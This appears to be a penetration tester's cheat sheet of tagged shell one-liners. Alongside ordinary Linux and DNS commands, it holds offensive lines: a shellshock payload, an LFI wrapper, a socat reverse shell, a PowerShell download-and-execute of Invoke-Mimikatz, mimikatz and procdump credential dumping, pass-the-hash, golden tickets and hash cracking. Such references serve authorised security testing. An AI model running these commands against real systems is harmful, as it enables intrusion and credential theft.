- - cmd: grep -rn --include "*.php" -e "\(\$_GET\|\$_POST\|\$_FILES\|\$REQUEST\|\$_COOKIES\|\$_SESSION\|\$_SERVER\|\$_GLOBALS\)" --color
- lang: sh
- tags: php, whitebox
- desc: php grep entry points
- - cmd: grep -rn --include "*.php" -e "^\(.*\s\|\)\(ob_start\|array_diff_uassoc\|array_diff_ukey\|array_filter\|array_intersect_uassoc\|array_intersect_ukey\|array_map\|array_reduce\|array_udiff_assoc\|array_udiff_uassoc\|array_udiff\|array_uintersect_assoc\|array_uintersect_uassoc\|array_uintersect\|array_walk_recursive\|array_walk\|assert_options\|uasort\|uksort\|usort\|preg_replace_callback\|spl_autoload_register\|iterator_apply\|register_shutdown_function\|register_tick_function\|set_error_handler\|set_exception_handler\|session_set_save_handler\|sqlite_create_aggregate\|sqlite_create_function\)(.*\\$"
- lang: sh
- tags: php, whitebox
- desc: php grep callbacks
- - cmd: grep -rn --include "*.php" -e "curl_exec" --color
- lang: sh
- tags: php, whitebox
- desc: php grep curl
- - cmd: grep -rni --include "*.php" -e "\(where\|query\).*\\$"
- lang: sh
- tags: php, whitebox
- desc: php grep where or query
- - cmd: for f in *.php; do grep "/include/auth.php" $f || echo $f; done |grep -v include | grep -v require
- lang: sh
- tags: php, whitebox
- desc: php grep file not contain an auth file include
- - cmd: curl <url>?<param>=php://filter/read=convert.base64-encode/resource=<file>.php
- lang: sh
- tags: php, whitebox
- desc: php wrapper lfi
- - cmd: crontab -l
- lang: sh
- tags: crontab, schedule
- desc: List cron jobs
- - cmd: crontab -e
- lang: sh
- tags: crontab, schedule
- desc: Edit cron job
- - cmd: grep <word> <file>
- lang: sh
- tags: pentest
- desc: grep classic
- - cmd: grep -i <word> <file>
- lang: sh
- tags: pentest
- desc: grep without case
- - cmd: grep <word> <file> -H
- lang: sh
- tags: pentest
- desc: grep with file found
- - cmd: grep -rn --include "*.<extension>" <word>
- lang: sh
- tags: pentest
- desc: grep recursive on extension
- - cmd: grep -e "\(<word_A>\|<word_B>\)" <file>
- lang: sh
- tags: pentest
- desc: grep word A or B
- - cmd: egrep -oE '(^|[^a-fA-F0-9])[a-fA-F0-9]{32}([^a-fA-F0-9]|$)' *.txt | egrep -o '[a-fA-F0-9]{32}' > md5-hashes.txt
- lang: sh
- tags: pentest
- desc: Extract md5 hashes ({32})
- - cmd: egrep -oE '(^|[^a-fA-F0-9])[a-fA-F0-9]{40}([^a-fA-F0-9]|$)' *.txt | egrep -o '[a-fA-F0-9]{40}' > sha1-hashes.txt
- lang: sh
- tags: pentest
- desc: Extract sha1 ({40})
- - cmd: egrep -oE '(^|[^a-fA-F0-9])[a-fA-F0-9]{64}([^a-fA-F0-9]|$)' *.txt | egrep -o '[a-fA-F0-9]{64}' > sha256-hashes.txt
- lang: sh
- tags: pentest
- desc: Extract sha256({64})
- - cmd: egrep -oE '(^|[^a-fA-F0-9])[a-fA-F0-9]{128}([^a-fA-F0-9]|$)' *.txt | egrep -o '[a-fA-F0-9]{128}' > sha512-hashes.txt
- lang: sh
- tags: pentest
- desc: Extract sha512({128})
- - cmd: grep -e "[0-7][0-9a-f]{7}[0-7][0-9a-f]{7}" *.txt > mysql-old-hashes.txt
- lang: sh
- tags: pentest
- desc: Extract valid MySQL-Old hashes
- - cmd: grep -e "$2a\$\08\$(.){75}" *.txt > blowfish-hashes.txt
- lang: sh
- tags: pentest
- desc: Extract blowfish hashes
- - cmd: egrep -o "([0-9a-zA-Z]{32}):(w{16,32})" *.txt > joomla.txt
- lang: sh
- tags: pentest
- desc: Extract Joomla hashes
- - cmd: egrep -o "([0-9a-zA-Z]{32}):(S{3,32})" *.txt > vbulletin.txt
- lang: sh
- tags: pentest
- desc: Extract VBulletin hashes
- - cmd: egrep -o '$H$S{31}' *.txt > phpBB3-md5.txt
- lang: sh
- tags: pentest
- desc: Extract phpBB3-MD5
- - cmd: egrep -o '$P$S{31}' *.txt > wordpress-md5.txt
- lang: sh
- tags: pentest
- desc: Extract Wordpress-MD5
- - cmd: egrep -o '$S$S{52}' *.txt > drupal-7.txt
- lang: sh
- tags: pentest
- desc: Extract Drupal 7
- - cmd: egrep -o '$1$w{8}S{22}' *.txt > md5-unix-old.txt
- lang: sh
- tags: pentest
- desc: Extract old Unix-md5
- - cmd: egrep -o '$apr1$w{8}S{22}' *.txt > md5-apr1.txt
- lang: sh
- tags: pentest
- desc: Extract md5-apr1
- - cmd: egrep -o '$6$w{8}S{86}' *.txt > sha512crypt.txt
- lang: sh
- tags: pentest
- desc: Extract sha512crypt, SHA512(Unix)
- - cmd: grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" <file>
- lang: sh
- tags: pentest
- desc: Extract emails from file
- - cmd: grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" <file>
- lang: sh
- tags: pentest
- desc: Extract valid IP addresses
- - cmd: grep -i "pwd\|passw" <file>
- lang: sh
- tags: pentest
- desc: Extract passwords
- - cmd: grep -i "user\|invalid\|authentication\|login" <file>
- lang: sh
- tags: pentest
- desc: Extract users
- - cmd: grep -i http | grep -shoP 'http.*?[" >]' <file> > http-urls.txt
- lang: sh
- tags: pentest
- desc: Extract HTTP URLS
- - cmd: i686-w64-mingw32-gcc <source.c> -lws2_32 -o <output.exe>
- lang: sh
- tags: compile
- desc: compile windows PE 32 executable on linux
- - cmd: sudo !!
- lang: sh
- tags: shell, linux
- desc: Re-call last input with sudo
- - cmd: help cd / help dir (...)
- lang: sh
- tags: shell, linux
- desc: Help
- - cmd: apropos directory / apropos search (...)
- lang: sh
- tags: shell, linux
- desc: Finding Help
- - cmd: sudo nano /etc/motd
- lang: sh
- tags: shell, linux
- desc: Define custom startup screen
- - cmd: <process> &
- lang: sh
- tags: shell, linux
- desc: Run a script as background process
- - cmd: ps -A
- lang: sh
- tags: shell, linux
- desc: List all running processes
- - cmd: killall <Process-name>
- lang: sh
- tags: shell, linux
- desc: Kill a running process
- - cmd: pwd
- lang: sh
- tags: shell, linux
- desc: Get the current path
- - cmd: hostname
- lang: sh
- tags: shell, linux
- desc: Get the current hostname
- - cmd: users
- lang: sh
- tags: shell, linux
- desc: Get the current users
- - cmd: cal
- lang: sh
- tags: shell, linux
- desc: Show calendar
- - cmd: date
- lang: sh
- tags: shell, linux
- desc: Show today's date
- - cmd: exit
- lang: sh
- tags: shell, linux
- desc: Exit terminal
- - cmd: ps -ef | grep apache | grep -v grep
- lang: sh
- tags: shell, linux
- desc: show process command
- - cmd: chgrp <group-name-from> <group-name-to>
- lang: sh
- tags: shell, linux
- desc: Change group
- - cmd: ls -Slrh
- lang: sh
- tags: shell, linux
- desc: List directory contents by size
- - cmd: ls -altr
- lang: sh
- tags: shell, linux
- desc: List all directory contents sorted by time edited reverse
- - cmd: ls *.<txt>
- lang: sh
- tags: shell, linux
- desc: List directory (wildcard matching)
- - cmd: find . -name *.<txt> -print
- lang: sh
- tags: shell, linux
- desc: List all files of type
- - cmd: cd -
- lang: sh
- tags: shell, linux
- desc: Go back to previous directory
- - cmd: mkdir <dirname>
- lang: sh
- tags: shell, linux
- desc: Make (empty) directory
- - cmd: rmdir <dirname>
- lang: sh
- tags: shell, linux
- desc: Remove (empty) directory
- - cmd: rm -rf <dirname>
- lang: sh
- tags: shell, linux
- desc: Remove directory with all contents without prompt
- - cmd: rm -rf *
- lang: sh
- tags: shell, linux
- desc: Remove directory contents and keep directory
- - cmd: cd <dirname>
- lang: sh
- tags: shell, linux
- desc: Change directory
- - cmd: ln -s <source-dirname> <destination-dirname>
- lang: sh
- tags: shell, linux
- desc: Create symlink
- - cmd: ln -sfn <source-dirname> <destination-dirname>
- lang: sh
- tags: shell, linux
- desc: Update symlink
- - cmd: unlink <sample-dirname>
- lang: sh
- tags: shell, linux
- desc: Remove symlink
- - cmd: touch <filename-txt>
- lang: sh
- tags: shell, linux
- desc: Make (empty) file
- - cmd: cp <filename> <file-copyname>
- lang: sh
- tags: shell, linux
- desc: Copy file
- - cmd: cp -a <old-folder>/ <new-folder>
- lang: sh
- tags: shell, linux
- desc: Copy/Page folder with content
- - cmd: mv <current-filename-path> <new-filename-path>
- lang: sh
- tags: shell, linux
- desc: Move/Rename file
- - cmd: mv -i <current-filename> <new-filename>
- lang: sh
- tags: shell, linux
- desc: Move/Rename file and prompt before overwriting an existing file
- - cmd: rm <filename-txt>
- lang: sh
- tags: shell, linux
- desc: Remove file
- - cmd: cat > <filename-txt>
- lang: sh
- tags: shell, linux
- desc: Write to file (will overwrite existing content)
- - cmd: find <filename-txt>
- lang: sh
- tags: shell, linux
- desc: Search for a filename-(not content!) in the current directory
- - cmd: grep -r <string> *
- lang: sh
- tags: shell, linux
- desc: Search for a string inside all files in the current directory and subdrectories
- - cmd: sed -i s/<original-text>/<new-text>/g <filename-txt>
- lang: sh
- tags: shell, linux
- desc: Search and replace within file
- - cmd: md5sum <filename-txt>
- lang: sh
- tags: shell, linux
- desc: MD5 hash for files
- - cmd: tar c <folder> | md5sum
- lang: sh
- tags: shell, linux
- desc: MD5 hash for folders
- - cmd: openssl enc -aes-256-cbc -e -in <sample-filename-txt> -out <sample-encrypted-txt>
- lang: sh
- tags: shell, linux
- desc: Encrypt file
- - cmd: openssl enc -aes-256-cbc -d -in <sample-encrypted> -out <sample-filename>
- lang: sh
- tags: shell, linux
- desc: Decrypt file
- - cmd: <username-remote>@<ip>
- lang: sh
- tags: shell, linux
- desc: Access via ssh
- - cmd: scp <username-remote>@<ip>:<file-to-send-path> <path-to-recieve>
- lang: sh
- tags: shell, linux
- desc: Copy file from server to local
- - cmd: scp <file-to-send> <username-remote>@<ip>:<where-to-put>
- lang: sh
- tags: shell, linux
- desc: Copy file from local to server
- - cmd: <path-to-file>\\\ <name-png>
- lang: sh
- tags: shell, linux
- desc: Escape files with spaces in name like this
- - cmd: df -h
- lang: sh
- tags: shell, linux
- desc: Show disc space
- - cmd: df -i
- lang: sh
- tags: shell, linux
- desc: Show disc space (inodes)
- - cmd: du -hs
- lang: sh
- tags: shell, linux
- desc: Show disc space for current directory
- - cmd: top or htop
- lang: sh
- tags: shell, linux
- desc: Current processes (also CPS usage)
- - cmd: ps aux | grep php
- lang: sh
- tags: shell, linux
- desc: Show running php processes
- - cmd: tail error.log -f -n 0
- lang: sh
- tags: shell, linux
- desc: Monitor error log (stream as file grows)
- - cmd: xdg-open <programme>
- lang: sh
- tags: shell, linux
- desc: Start application
- - cmd: export <TESTING>=<Variable-text>
- lang: sh
- tags: shell, linux
- desc: Register variable
- - cmd: echo $<Variable>
- lang: sh
- tags: shell, linux
- desc: Echo variable
- - cmd: unset <Variable>
- lang: sh
- tags: shell, linux
- desc: Unset variable
- - cmd: echo <Hello> > <hello-txt>
- lang: sh
- tags: shell, linux
- desc: Write to file
- - cmd: cat <file1-txt> >> <file2-txt>
- lang: sh
- tags: shell, linux
- desc: Append content from a file to another file
- - cmd: cat <file1-txt> | <word-count> | cat > <file2-txt>
- lang: sh
- tags: shell, linux
- desc: Add the amount of lines, words, and characters to file2-txt
- - cmd: sort <hello-txt>
- lang: sh
- tags: shell, linux
- desc: Sort the content of a file (like cat)
- - cmd: cat <file1-txt> | sort > <sorted-file1-txt>
- lang: sh
- tags: shell, linux
- desc: Save to sorted content to a new file
- - cmd: sort <file1-txt> | uniq > <uniq-file1-txt>
- lang: sh
- tags: shell, linux
- desc: Sort and remove duplicates and save to a new file
- - cmd: 'curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" <url>'
- lang: sh
- tags: shell, linux
- desc: shellshock
- - cmd: echo <content> | curl -F-=\<- qrenco.de
- lang: sh
- tags: qr code
- desc: Create a QR code with some content
- - cmd: cat <json_file> | ruby -ryaml -rjson -e 'puts YAML.dump(JSON.load(ARGF))'
- lang: sh
- tags: json
- desc: convert JSON to YAML
- - cmd: grep <pattern> <file> | tr '\n' ' '
- lang: sh
- tags: misc, linux
- desc: Convert multi line to one line
- - cmd: grep <pattern> <file>.gnmap|cut -d ' ' -f 2 | tr '\n' ' '
- lang: sh
- tags: misc, linux
- desc: grep nmap protocol from file and get ips in one line
- - cmd: amap -d <ip> <port>
- lang: sh
- tags: misc, linux
- desc: find service on port
- - cmd: sed 's/ 7z/ Android-Debug-Bridge-adb/ apktool/ application-whitelisting/ Arsenal/ AWS/ binwalk/ bloodhound/ bof/ Brew/ C/ certipy/ certutil/ cewl/ chisel/ cme/ coercer/ Compile-windows-PE-32/ Crack-files/ Crontab/ crunch/ cve-bin-tool/ Dirb/ DNS/ Docker/ dotnet-.net/ drupwn/ enum4linux/ eyewitness/ feroxbuster/ ffuf/ flashrom/ FTP/ git/ gobuster/ gowitness/ gpg/ grep/ grep-hash/ gzip/ hashcat/ Hydra/ impacket/ Impacket/ Jadx/ john-the-ripper/ json/ JwtTool/ kerberos/ keytool/ kubernetes/ LAPS/ Lazagne/ ldap/ linux/ linux-bash/ Lsassy/ mimikatz/ mitm6/ MSF/ msfvenom/ msfvenom-create-user/ msfvenom-Handler/ msfvenom-Shellcode/ msssql/ Mysql/ ncat/ netbios/ netcat/ network/ nfs/ nikto/ nmap/ nodejs/ npm/ nvm/ Objection/ openssl/ Others-grep/ php-grep/ pop/ Postgres/ powershell/ powerview/ Printerbug-and-Petitpotam/ procdump/ QR-code/ race-condition/ rar/ rdesktop/ Redis/ responder/ reverse-shell/ rpcclient/ rubeus/ Scripting-Payloads/ SCShell/ Searchsploit/ sed/ server/ Service/ smb/ smbmap/ SMTP/ snmp/ socat/ SQLMAP/ ssh/ systemctl/ tar/ telnet/ Tomcat/ unblob/ veracrypt/ VNC/ WEB/ web-shell/ wfuzz/ wifi/ windows/ windows-rdp/ winrm/ WPSCAN/ X11/ xfreerdp/ ysoserial/ ysoserial.net/ yum/ zip/ /g'
- lang: sh
- tags: sed
- desc: change multiple space to one
- - cmd: sed 's/.$//g'
- lang: sh
- tags: sed
- desc: delete the last char
- - cmd: veracrypt -t --create <file> --hash sha512 --encryption AES --filesystem ext4 --volume-type normal -k "" --pim 0 --size <size>
- lang: sh
- tags: veracrypt
- desc: Create veracrypt volume for Linux
- - cmd: veracrypt <file> <mount>
- lang: sh
- tags: veracrypt
- desc: Open veracrypt volume
- - cmd: veracrypt -d <file>
- lang: sh
- tags: veracrypt
- desc: Lock veracrypt volume
- - cmd: veracrypt -d
- lang: sh
- tags: veracrypt
- desc: Lock all veracrypt volume
- - cmd: sessions -u <session_id>
- lang: sh
- tags: metasploit
- desc: upgrade session to meterpreter
- - cmd: sessions -l
- lang: sh
- tags: metasploit
- desc: show session list
- - cmd: route print
- lang: sh
- tags: metasploit
- desc: print route table
- - cmd: use multi/manage/autoroute
- lang: sh
- tags: metasploit
- desc: add pivot (autoroute)
- - cmd: use auxiliary/server/socks_proxy
- lang: sh
- tags: metasploit
- desc: add socks proxy (autoroute first)
- - cmd: load incognito
- lang: sh
- tags: metasploit
- desc: load incognito
- - cmd: impersonate_token <domain>\\<user>
- lang: sh
- tags: metasploit
- desc: incognito impersonate token
- - cmd: execute -H -f <process|notepad>
- lang: sh
- tags: metasploit
- desc: create process
- - cmd: migrate -N <process_name|notepad.exe>
- lang: sh
- tags: metasploit
- desc: migrate with name
- - cmd: load kiwi; kiwi_cmd "!processprotect /process:lsass.exe /remove"; creds_all
- lang: sh
- tags: metasploit
- desc: PPL remove
- - cmd: use post/windows/gather/credentials/enum_laps
- lang: sh
- tags: metasploit
- desc: enum LAPS
- - cmd: searchsploit -m <ebdid>
- lang: sh
- tags: searchsploit, exploit db
- desc: searchsploit mirror exploitDB id
- - cmd: searchsploit -x <edbid>
- lang: sh
- tags: searchsploit, exploit db
- desc: searchsploit show exploitDB id
- - cmd: ./chisel server -v -p <server_port|8000> --reverse
- lang: sh
- tags: chisel
- desc: chisel server (server on local machine)
- - cmd: ./chisel client -v <server_ip>:<server_port|8000> R:<serverside-port>:<clientside-host|localhost>:<clientside-port>
- lang: sh
- tags: chisel
- desc: chisel reverse port forwarding (client on remote machine) - forward client port on server
- - cmd: ./chisel client -v <server_ip>:<server_port|8000> <clientside-host|0.0.0.0>:<clientside-port>:<serverside-host|127.0.0.1>:<serverside-port>
- lang: sh
- tags: chisel
- desc: chisel remote port forwarding (client on remote machine) - forward server port on client
- - cmd: ./chisel client <server_ip>:<server_port> R:socks
- lang: sh
- tags: chisel
- desc: chisel socks proxy (client on remote machine)
- - cmd: curl https://ipinfo.io/<ip>
- lang: sh
- tags: network, ip
- desc: ip infos (hostname / city / country / isp )
- - cmd: curl https://ipinfo.io/
- lang: sh
- tags: network, ip
- desc: what is my ip
- - cmd: curl https://ipecho.net/plain/
- lang: sh
- tags: network, ip
- desc: what is my ip - plaintext
- - cmd: curl portquiz.net:<port>
- lang: sh
- tags: network, ip
- desc: test an internet port out allow - curl (no 445)
- - cmd: nc -v portquiz.net <port>
- lang: sh
- tags: network, ip
- desc: test an internet port out allow - nc (no 445)
- - cmd: ./socat TCP-LISTEN:<port_listener|4444>,fork,reuseaddr TCP-LISTEN:<port_to_forward>
- lang: sh
- tags: socat
- desc: socat port forwarding listener (on local machine)
- - cmd: ./socat TCP:<connect_ip>:<connect_port|4444> TCP:127.0.0.1:<port_to_forward>
- lang: sh
- tags: socat
- desc: socat port forwarding connect (on remote machine)
- - cmd: ./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<listner_ip>:<listner_port|4444>
- lang: sh
- tags: socat
- desc: socat reverse shell (remote victime)
- - cmd: socat file:`tty`,raw,echo=0 tcp-listen:<listner_port|4444>
- lang: sh
- tags: socat
- desc: socat reverse shell listener (local)
- - cmd: fcrackzip -u -D -p <wordlist> <file>.zip
- lang: sh
- tags: bruteforce, crack, files
- desc: ZIP - fcrackzip
- - cmd: zip2john <file>.zip > zip.john; ; john zip.john
- lang: sh
- tags: bruteforce, crack, files
- desc: ZIP - john
- - cmd: cat <wordlist> | 7za t <file>.7z
- lang: sh
- tags: bruteforce, crack, files
- desc: 7z - 7za
- - cmd: ./7z2john.pl <file>.7z > 7zhash.john; ; john 7zhash.john
- lang: sh
- tags: bruteforce, crack, files
- desc: 7z - john
- - cmd: pdfcrack <file>.pdf -w <wordlist>
- lang: sh
- tags: bruteforce, crack, files
- desc: PDF - pdfcrack
- - cmd: qpdf --password=<PASSWORD> --decrypt <encrypted_pdf>.pdf <plaintext_pdf>.pdf
- lang: sh
- tags: bruteforce, crack, files
- desc: PDF decrypt - qpdf
- - cmd: keepass2john <file>.kdbx > out.kbdx.hashes && john --wordlist <wordlist> out.kbdx.hashes
- lang: sh
- tags: bruteforce, crack, files
- desc: keepass kdbx - john
- - cmd: python3 <path_to_john>/run/office2john.py <file>.xls > out.hash && john --wordlist <wordlist> out.hash
- lang: sh
- tags: bruteforce, crack, files
- desc: XLS PPT DOC - john
- - cmd: hashcat -a 0 -m 400 hashes <wordlist>
- lang: sh
- tags: password recovery, password cracking
- desc: hashcat - basic md5 (joomla/wordpress) - wordlist
- - cmd: hashcat -a 0 -m 400 hashes <wordlist> -r /usr/share/doc/hashcat/rules/best64.rule
- lang: sh
- tags: password recovery, password cracking
- desc: hashcat - basic md5 (joomla/wordpress) - wordlist with rules
- - cmd: hashcat -m 13100 --force -a 0 hashes <wordlist>
- lang: sh
- tags: password recovery, password cracking
- desc: hashcat - kerberos ticket (after kerberoasting)
- - cmd: hashcat -m 3000 -a 0 hashes <wordlist>
- lang: sh
- tags: password recovery, password cracking
- desc: hashcat - LM
- - cmd: hashcat -m 1000 -a 0 hashes <wordlist>
- lang: sh
- tags: password recovery, password cracking
- desc: hashcat - NTLM
- - cmd: hashcat -m 5500 -a 0 hashes <wordlist>
- lang: sh
- tags: password recovery, password cracking
- desc: hashcat - NTLMv1
- - cmd: hashcat -m 5600 -a 0 hashes <wordlist>
- lang: sh
- tags: password recovery, password cracking
- desc: hashcat - NTLMv2
- - cmd: hashcat -m 5600 --force -a 1 hashes <custom_wordlist> <custom_wordlist>
- lang: sh
- tags: password recovery, password cracking
- desc: hashcat - NTLMv2 - Combination attack (ex:passpass,testtest,passtest,etc)
- - cmd: cat keywords.txt | hashcat -r <rule_file> --stdout > ./<custom_wordlist>
- lang: sh
- tags: password recovery, password cracking
- desc: hashcat - generate wordlist using rules
- - cmd: john --wordlist=<wordlist> --format=lm hash.txt
- lang: sh
- tags: password recovery, password cracking
- desc: john LM
- - cmd: john --wordlist=<wordlist> --format=nt hash.txt
- lang: sh
- tags: password recovery, password cracking
- desc: john NTLM
- - cmd: john --wordlist=<wordlist> --format=netntlm hash.txt
- lang: sh
- tags: password recovery, password cracking
- desc: john NTLMv1
- - cmd: john --wordlist=<wordlist> --format=netntlmv2 hash.txt
- lang: sh
- tags: password recovery, password cracking
- desc: john NTLMv2
- - cmd: python /usr/share/john/ssh2john.py <ssh_key> > <ssh_hash|sshkey.hash>
- lang: sh
- tags: password recovery, password cracking
- desc: john ssh convert key
- - cmd: john --wordlist=<wordlist> <ssh_hash|sshkey.hash>
- lang: sh
- tags: password recovery, password cracking
- desc: john ssh
- - cmd: lazagne.exe all
- lang: sh
- tags: lazagne, dump password
- desc: lazagne dump all passwords (trig av)
- - cmd: mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"
- lang: sh
- tags: mimikatz, passwords
- desc: mimikatz onliner
- - cmd: (new-object system.net.webclient).downloadstring('http://<lhost>/Invoke-Mimikatz.ps1') | IEX; Invoke mimikatz
- lang: ps1
- tags: mimikatz, passwords
- desc: powershell - load mimikatz
- - cmd: mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "sekurlsa::logonpasswords" "exit"
- lang: sh
- tags: mimikatz, passwords
- desc: mimikatz disable PPL and dump passwords
- - cmd: mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:<domain> /user:<user>" "exit"
- lang: sh
- tags: mimikatz, passwords
- desc: mimikatz dcsync - user (krbtgt/Administrator)
- - cmd: mimikatz.exe "privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords" "exit"
- lang: sh
- tags: mimikatz, passwords
- desc: mimikatz extract credentials from dump
- - cmd: mimikatz.exe "lsadump::sam /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /security:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY /sam:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM"
- lang: sh
- tags: mimikatz, passwords
- desc: mimikatz extract credentials from shadow copy (1)
- - cmd: mimikatz.exe "lsadump::secrets /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /security:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY"
- lang: sh
- tags: mimikatz, passwords
- desc: mimikatz extract credentials from shadow copy (2)
- - cmd: powershell.exe "[System.IO.File]::Copy('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM', '.\Desktop\SYSTEM.bkp'); [System.IO.File]::Copy('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY', '.\Desktop\SECURITY.bkp'); [System.IO.File]::Copy('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM', '.\Desktop\SAM.bkp')"
- lang: sh
- tags: mimikatz, passwords
- desc: extract on hand shadow volume copy
- - cmd: sekurlsa::tickets /export
- lang: sh
- tags: mimikatz, passwords
- desc: mimikatz extract tickets
- - cmd: kerberos::golden /user:<user> /domain:<domain> /sid:<child_sid> /krbtgt:<krbtgt_ntlm> /sids:<parent_sid>-519 /ptt
- lang: ps1
- tags: mimikatz, passwords
- desc: mimikatz - forest extra SID
- - cmd: sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<ntlm_hash> /run:"mstsc.exe /restrictedadmin"
- lang: sh
- tags: mimikatz, passwords
- desc: mimikatz pth to RDP mstsc.exe
- - cmd: sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<ntlm_hash> /run:powershell
- lang: sh
- tags: mimikatz, passwords
- desc: mimikatz pth run powershell remotelly
- - cmd: C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
- lang: ps1
- tags: procdump, lsass, credentials
- desc: procdump - dump lsass - local
- - cmd: 'net use Z: https://live.sysinternals.com; Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp'
- lang: ps1
- tags: procdump, lsass, credentials
- desc: procdump - dump lsass - remote
- - cmd: host -t ns <domain>
- lang: sh
- tags: dns, host, 53
- desc: host find name server
- - cmd: host -t mx <domain>
- lang: sh
- tags: dns, host, 53
- desc: host find mail server
- - cmd: dig <domain_name> @1.1.1.1
- lang: sh
- tags: dns, host, 53
- desc: dig dns lookup
- - cmd: dig ANY <domain_name> @<dns_ip>
- lang: sh
- tags: dns, host, 53
- desc: dig any information
- - cmd: dig -x <ip> @<dns_ip>
- lang: sh
- tags: dns, host, 53
- desc: dig reverse lookup
- - cmd: dig axfr <domain_name> @<name_server>
- lang: sh
- tags: dns, host, 53
- desc: dig zone transfer
- - cmd: dig +short <domain_name> @resolver1.opendns.com
- lang: sh
- tags: dns, host, 53
- desc: dig, find external, public IP address
- - cmd: dig -f <domains.txt> +noall +answer
- lang: sh
- tags: dns, host, 53
- desc: dig, find domains file ip address value
- - cmd: dig -f <domains.txt> MX +noall +answer
- lang: sh
- tags: dns, host, 53
- desc: dig, find domains file MX ip record
- - cmd: dnsrecon -d <domain>
- lang: sh
- tags: dns, host, 53
- desc: dnsrecon standard enum on domain
- - cmd: dnsrecon -d <domain> -t axfr
- lang: sh
- tags: dns, host, 53
- desc: dnsrecon zone transfer
- - cmd: dnsrecon -r <startip>-<endip> -n <domain_name_server>
- lang: sh
- tags: dns, host, 53
- desc: dnsrecon reverse lookup start/end ip
- - cmd: dnsrecon -r <ip_with_network_mask> -n <domain_name_server>
- lang: sh
- tags: dns, host, 53
- desc: dnsrecon reverse lookup network range ip
- - cmd: dnsrecon -d <domain> -D <wordlist> -t brt; dnsenum <domain>
- lang: sh
- tags: dns, host, 53
- desc: dnsrecon domain bruteforce
- - cmd: nmap -sV -p 53 --script dns-nsid <ip>
- lang: sh
- tags: dns, host, 53
- desc: nmap grab banner
- - cmd: nmap -n -sV --script "(*dns* and (default or (discovery and safe))) or dns-random-txid or dns-random-srcport" -p 53 <ip>
- lang: sh
- tags: dns, host, 53
- desc: nmap dns tcp
- - cmd: nmap -n -sV -sU --script "(*dns* and (default or (discovery and safe))) or dns-random-txid or dns-random-srcport" -p 53 <ip>
- lang: sh
- tags: dns, host, 53
- desc: nmap dns udp
- - cmd: nmap --script dns-srv-enum --script-args dns-srv-enum.domain='<domain>'
- lang: sh
- tags: dns, host, 53
- desc: nmap activedirectory enum
- - cmd: nmap -sSU -p53 --script dns-nsec-enum --script-args dns-nsec-enum.domains=<domain> <ip>
- lang: sh
- tags: dns, host, 53
- desc: nmap dnssec
- - cmd: msfconsole -x "use auxiliary/gather/enum_dns; set domain <domain>; set ns <dns_server>; exploit"
- lang: sh
- tags: dns, host, 53
- desc: dns metasploit enumeration
- - cmd: sublist3r -d <domain> -v
- lang: sh
- tags: dns, host, 53
- desc: dns sublist3r - subdomain enumeration
- - cmd: sublist3r -b -d <domain>
- lang: sh
- tags: dns, host, 53
- desc: dns sublist3r - subdomain enumeration with bruteforce module enabled
- - cmd: wget -m ftp://anonymous:anonymous@<ip>
- lang: sh
- tags: ftp, 21
- desc: ftp - download all
- - cmd: wget -m --no-passive ftp://anonymous:anonymous@<ip>
- lang: sh
- tags: ftp, 21
- desc: ftp download all (2)
- - cmd: ftp <ip>
- lang: sh
- tags: ftp, 21
- desc: ftp - connect
- - cmd: ftp <ip> <port>
- lang: sh
- tags: ftp, 21
- desc: ftp - connect port
- - cmd: nmap -v -p 21 --script=ftp-anon.nse <ip>
- lang: sh
- tags: ftp, 21
- desc: ftp - enum anonym
- - cmd: msfconsole -x "use auxiliary/scanner/ftp/ftp_login; set RHOSTS <ip>; set USER_FILE <user_file>; set PASS_FILE <password_file>; exploit"
- lang: sh
- tags: ftp, 21
- desc: ftp - msf bruteforce login
- - cmd: nmap -n -sV --script "ldap* and not brute" -p 389 <ip>
- lang: sh
- tags: pentest
- desc: ldap nmap
- - cmd: ldapsearch -x -H ldap://<dc_fqdn> -s base
- lang: sh
- tags: pentest
- desc: ldapsearch base
- - cmd: ldapsearch -Y GSSAPI -H ldap://<dc_fqdn> -D "<user>" -W -b "dc=<domain>,dc=<path>" "servicePrincipalName=*" servicePrincipalName
- lang: sh
- tags: pentest
- desc: ldapsearch SPN
- - cmd: ldapsearch -x -H ldap://<dc_fqdn> -b <basedn>
- lang: sh
- tags: pentest
- desc: ldapsearch with base dn
- - cmd: ldapsearch -x -H ldap://<dc_fqdn> -D <domain>\\<username> -w '<password>' -b 'DC=<domain>,DC=<path>'
- lang: sh
- tags: pentest
- desc: ldapsearch base with authentication
- - cmd: ldapsearch -x -H ldap://<dc_fqdn> -D <domain>\\<username> -w '<password>' -b 'DC=<domain>,DC=<path>' '(&(objectCategory=person)(objectClass=user))'
- lang: sh
- tags: pentest
- desc: ldapsearch - list all users
- - cmd: ldapsearch -x -H ldap://<dc_fqdn> -D <domain>\\<username> -w '<password>' -b 'DC=<domain>,DC=<path>' '(&(objectCategory=user)(adminCount=1))'
- lang: sh
- tags: pentest
